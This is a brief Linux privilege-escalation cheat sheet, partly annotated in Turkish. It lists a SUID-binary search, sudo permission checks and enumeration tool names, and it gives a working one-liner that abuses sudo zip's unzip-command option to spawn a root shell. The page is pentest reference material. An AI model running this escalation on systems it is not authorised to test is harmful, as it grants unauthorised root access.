Linux Priv Esc

SUID BIT

# find / -perm -4000 -exec ls -al -print 2>/dev/null {} \;

Sudo Check

# sudo -l (Kullanıcının çalıştırmaya izni olan/olmayan komutlar)
# sudo -l -U <User> (Belirtilen kullancının izni olan/olmayan komutlar)

Check Tools

linuxprivchecker.py

unix-privesc-check.py

LinEnum

zip priv esc

sudo zip exploit.zip exploit -T --unzip-command="python -c 'import pty; pty.spawn(\"/bin/sh\")'"

Last updated